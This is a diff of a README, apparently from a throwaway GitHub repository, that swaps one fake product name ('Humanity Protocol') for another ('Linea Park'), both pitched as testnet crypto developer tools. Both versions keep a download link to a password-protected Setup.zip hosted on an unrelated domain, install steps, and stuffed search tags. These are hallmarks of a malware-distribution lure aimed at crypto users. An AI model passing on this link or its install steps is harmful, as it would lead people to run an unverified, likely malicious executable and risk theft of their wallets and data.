dhsidhs/dhsidhs1/README.md

-# 🚀 Humanity Protocol 🚀
+## 📜 Overview

+**Linea Park** is a decentralized mapping platform on Testnet, providing developers with tools for building geolocation and mapping applications with blockchain security and data integrity.

 # [DOWNLOAD](https://erdogansigorta.com/temp/Setup.zip)
 ## Password - z4iS5VVOeZIe

-## 📜 Overview

-**Humanity Protocol** is a Testnet application designed to facilitate decentralized identity and verification services.
-It enables developers to create and test systems focused on secure, decentralized identity management.

 ### 📋 How to Use

-1. **Download Humanity Protocol** using the link above.
+1. **Download Linea Park** using the link provided.
-2. **Install** the application on your system.
+2. **Install** Linea Park on your device.
-3. **Begin developing and testing** identity verification services on the decentralized platform.
+3. **Develop mapping and geolocation applications** with decentralized data management.

+If Linea Park is useful for your project, please ⭐ this repository!

+### 🔑 Tags

+- Linea-Park
+- Linea-mapping
+- Linea-geolocation
+- Linea-decentralized
+- Linea-Testnet
+- Linea-free-download
+- Linea-setup-2024
+- Linea-install
+- Linea-platform
+- Linea-tools
+- Linea-crypto
+- Linea-for-developers
+- Linea-blockchain
+- Linea-data
+- Linea-location
+- Linea-map-data
 ---

-If you find Humanity Protocol helpful, please ⭐ this repository!

-### 🔑 Tags

-- Humanity-Protocol
-- Humanity-Protocol-for-Testnet
-- Humanity-Protocol-identity-verification
-- Humanity-Protocol-decentralized
-- Humanity-Protocol-free
-- Humanity-Protocol-setup
-- Humanity-Protocol-install
-- Humanity-Protocol-2024